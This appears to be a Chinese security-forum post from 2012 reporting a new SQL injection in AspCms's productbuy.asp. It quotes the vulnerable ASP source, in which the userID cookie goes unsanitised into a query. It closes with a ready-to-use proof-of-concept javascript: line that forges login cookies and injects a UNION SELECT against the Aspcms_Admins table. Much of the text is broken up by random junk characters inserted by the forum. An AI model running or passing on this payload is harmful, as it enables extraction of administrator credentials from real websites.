好久没上土司了,上来一看发现在删号名单内.....
2 y+ d1 D2 M. g& V# a; [. b也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。
6 u5 T1 a* `! g0 m; j/ g) h; U废话不多说,看代码:
- [& n- W2 ?1 J. I* B" [/ p5 D0 X) \7 n. y/ d
<%
# O& q; `0 \, J. Z$ M* E- y% ]! |4 A, K9 R4 d
if action = "buy" then
) m# i+ L5 t( u; G, @" u: ~
* r2 T. P H9 d; C& Q V addOrder()
! I! C# I4 @% Q* P, R% O! k4 y; A: [' l. j* v, Z, d
else
q$ y0 i3 z# B* g( \) t7 S& Q$ j! F9 C1 p! a z( y/ \6 M/ v
echoContent()
" n( m( x' B$ \. x. m! ?8 W4 d3 d( H' e! }
end if
# U, H( N7 [- |+ o4 w/ d& s* k
9 M$ z/ ?2 `: w3 l0 T9 u) }4 I' P0 y4 t! ]/ C8 F
) w! `9 q( ]- j/ w& x$ [: }
……略过0 _" {0 ~% L1 Q- D# c
. o$ T+ w* m, s6 l7 q, z/ j0 Q+ G) `
6 @: X6 d# A+ } j6 M1 ~+ J% b% N: d8 Z- \- @0 }
Sub echoContent()
" w. M8 Y) O9 [1 E, }+ \! n: W. | h; {# K2 M' V7 V, O& O. y
dim id
2 S9 I/ A" `% v( A4 G+ e& p! s
+ Z: q7 |: }. K id=getForm("id","get")- x5 S% ]! E$ g; O% Q1 L" T4 h
( D0 R f5 u. n7 T( h( ~ - u Z. V% d. h( f) z. V
3 J; E& F# a. v$ f
if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
" ^8 c$ B- }" m" v/ W% c) g9 k. X. X
- M; m. M; n' D& J# B2 n0 P! B, S4 H8 q) n% k
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")' a6 ?, P5 G B0 E
: G, X% C- t+ o3 F# N7 h
dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct4 b/ [& F0 s- z5 H+ l" I
0 f* J1 J7 M/ e0 \! W1 i Dim templatePath,tempStr, N4 ~5 y5 C* ?
8 s) u& Y' b9 I" }
templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
: y7 q4 H2 b; x5 y( Z4 l- D
& b8 E+ z& Q) Q( ^2 a; T0 u$ y
& f; ]3 [, {; [ W+ H7 N# t
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")5 }, ?9 `. |/ n
: o& `0 {, D& J3 k- [* h
selectproduct=rsObj(0)
5 a5 ?, b' U9 B- @3 |
7 ~7 v$ {8 q8 C( K" ^, v
2 i" S" q0 X1 I7 a' A; [0 K/ l6 ^& U( x v1 h
Dim linkman,gender,phone,mobile,email,qq,address,postcode( s+ T1 m, Y* h! R9 S% G1 c
3 {" h% g8 k) Y8 N( w4 \' U0 r if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0
4 R7 W3 E- t7 u* T
# v: D* J& ?) g1 K if rCookie("loginstatus")=1 then % m6 }& E$ S! r1 D
& S7 j; H0 k+ c% \ set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")1 H+ ?% M+ H, L8 H; u! K, a# [; r
! V* h. E0 a% X linkman=rsObj("truename")2 c9 O8 d9 }% l2 ^" }2 _" g9 X
3 N+ y8 J) j! ~2 d gender=rsObj("gender")
' \- T9 Y2 t# M6 c" S
6 r, e0 b% B; D: d phone=rsObj("phone")3 H% ^+ f8 v* {4 L4 Z
0 u" D! ]3 |* p+ w4 U4 N( l$ Q3 V
mobile=rsObj("mobile")
* [4 u# N) K- \! C9 x' O9 U% M* B2 @; ?' Y, L3 I5 _! _
email=rsObj("email")
+ D( K. u" u, i; F
3 z3 a* N5 s5 f) o qq=rsObj("qq")
$ U. [3 B" G0 |) K7 M1 j- G3 X/ {- ^' ?7 E+ K2 L% r& ^
address=rsObj("address")& ~) w) d+ f" P
7 H9 k- M0 \: g: d; W" e' n postcode=rsObj("postcode")1 S4 E8 ^$ k7 d( j+ [: ^0 l
2 ~# ~4 Z ]4 ?1 A else ; ]& `# q3 E8 Q/ I
% y. D. z% b+ d, s. H) F5 F; I gender=1/ e; l# P& n) y
0 h) l- D6 Y4 m9 P
end if
) g0 o2 M6 k0 c1 X, I
; f0 N, ~7 c+ V1 J r" d; L rsObj.close()
* P3 X9 P. Y( J
/ {: S, L( Q( d: M
. S, P; W0 d7 C. ~0 z, x3 ` B
3 [" O+ F. M- a4 `) Z with templateObj
0 c( d7 A' X+ v
' w$ q& H7 l$ e2 h" t- Z9 [1 o .content=loadFile(templatePath)
1 q, E( O+ m" `% T$ v" x& s3 `6 J7 `0 H. z
.parseHtml()/ I! r% v( h$ } V1 U# C
! Q; o$ `# C% m) |3 n5 ~, ?
.content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
+ ]: n7 s: H0 O) l3 Z3 i$ w# \' O8 Z( a* Y
.content=replaceStr(.content,"[aspcms:linkman]",linkman) 1 m) q/ d! j( \1 Q4 a, ?& @
, l- L6 |% z% X .content=replaceStr(.content,"[aspcms:gender]",gender)
# `. _6 X$ ]# O( g5 V+ z- j: @% X
.content=replaceStr(.content,"[aspcms:phone]",phone) & M# m3 y! Y: U, z
; Y, `* A& P. b .content=replaceStr(.content,"[aspcms:mobile]",mobile) / ?* p1 G* b' i# ^
1 {/ D( [7 j0 }- J4 f .content=replaceStr(.content,"[aspcms:email]",email)
) v4 O& q$ w/ V& n% {' z3 A d3 Y9 m$ H. h4 @7 a4 T9 u# |9 a5 Y
.content=replaceStr(.content,"[aspcms:qq]",qq)
" o# y: p5 T# K2 v, r# n5 i T9 a' z
.content=replaceStr(.content,"[aspcms:address]",address) - K% Z9 D s, }
! B4 R. m9 D. b3 g& C0 ` .content=replaceStr(.content,"[aspcms:postcode]",postcode)
2 s- L+ l2 j q0 {) u/ ^
% R+ P/ `* l$ I' q .parseCommon() 6 B2 Q. \/ g& S5 A1 G- ?2 i4 e
8 l& `6 G4 j. Z0 W j echo .content * e3 t0 M: |! h% ^3 w a
2 e( C4 \ W4 z end with
* s3 J; K2 ^1 |) W
, b$ v; O1 @9 l* D# W9 B set templateobj =nothing : terminateAllObjects$ y7 ~* D* `5 Y* U
* _1 H8 w& h2 a, B- x, a8 BEnd Sub8 D& A- y! u! \' _
漏洞很明显,没啥好说的
/ r i( \9 T. H9 m; I' Apoc:
# I/ K* i. D9 l0 ]7 |& [' [0 M
( h* q+ o1 Q$ E0 A# O( |4 Ojavascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子% S- X+ B1 u5 j& I3 q
5 ~5 q$ J5 W0 B, B; |& j z% C7 a
|
发表于 2012-12-27 08:35:05
收藏
支持
反对